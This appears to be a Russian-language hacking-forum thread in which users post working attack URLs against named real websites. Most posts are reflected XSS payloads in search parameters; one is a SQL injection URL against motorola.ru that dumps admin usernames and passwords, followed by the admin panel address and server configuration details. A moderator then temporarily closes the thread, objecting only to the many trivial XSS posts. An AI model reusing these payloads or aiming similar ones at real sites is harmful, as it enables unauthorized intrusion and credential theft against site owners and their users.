На таком знаменитом сайте такие знаменитые баги _http://rusdoc.kulichki.ru/public/search.shtml?searWords="><script>alert()</script>
Мне очень понравился этот баг: _http://www.sprandi.ru/search?q="><script>alert()</script> XSS Rulezzz!!!
Motorola RU - неожидал _http://www.motorola.ru/pcomm.php?id=33&action=hole&newsid=3122666+UNION+SELECT+0,0,0,name,password,0,0,0,0,0,0,0,0,0,0+FROM+users/* логин и пароль(в чистом виде) к админке: _http://www.motorola.ru/admin/
да, но: safe_mode: ON PHP version: 4.3.11 cURL: OFF MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF Disable functions : dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit
красивый дизайн у сайтов! =) _http://www.cenmax.ru/search.html?q='><script>alert(/kaban/)</script> _http://oriole.ru/search.html?q='><script>alert(/kaban/)</script> _http://sentry.ru/search.html?q='><script>alert(/kaban/)</script> _http://inspector-alarm.ru/search.html?q='><script>alert(/kaban/)</script>
_http://www.military-loan-savvy.com/military-personal-loans.html?source=yahoo&campaign - алерт в поисковике _http://usmcshop.grunt.com/Grunt/ в поисковике алерт
Короче учитывая мнения многих юзеров, временно закрываю темку, до тех пор пока с модерами не обсудим.Многие правы, нефиг стоко пассив хсс выкладывать, вот чел выложил баг на мотороле, респект ему. 2dracula: а ты заипал со своими хсс-ками пассивными + каждый в отдельном посте... ТЕМА ЗАКРЫТА ВРЕМЕННО.
Согласен довно хотел тоже сказать, эти ксс вообше сидят в горле, нужна обсудить и сделать так что бы были реальные баги , а не пасивные ксс.
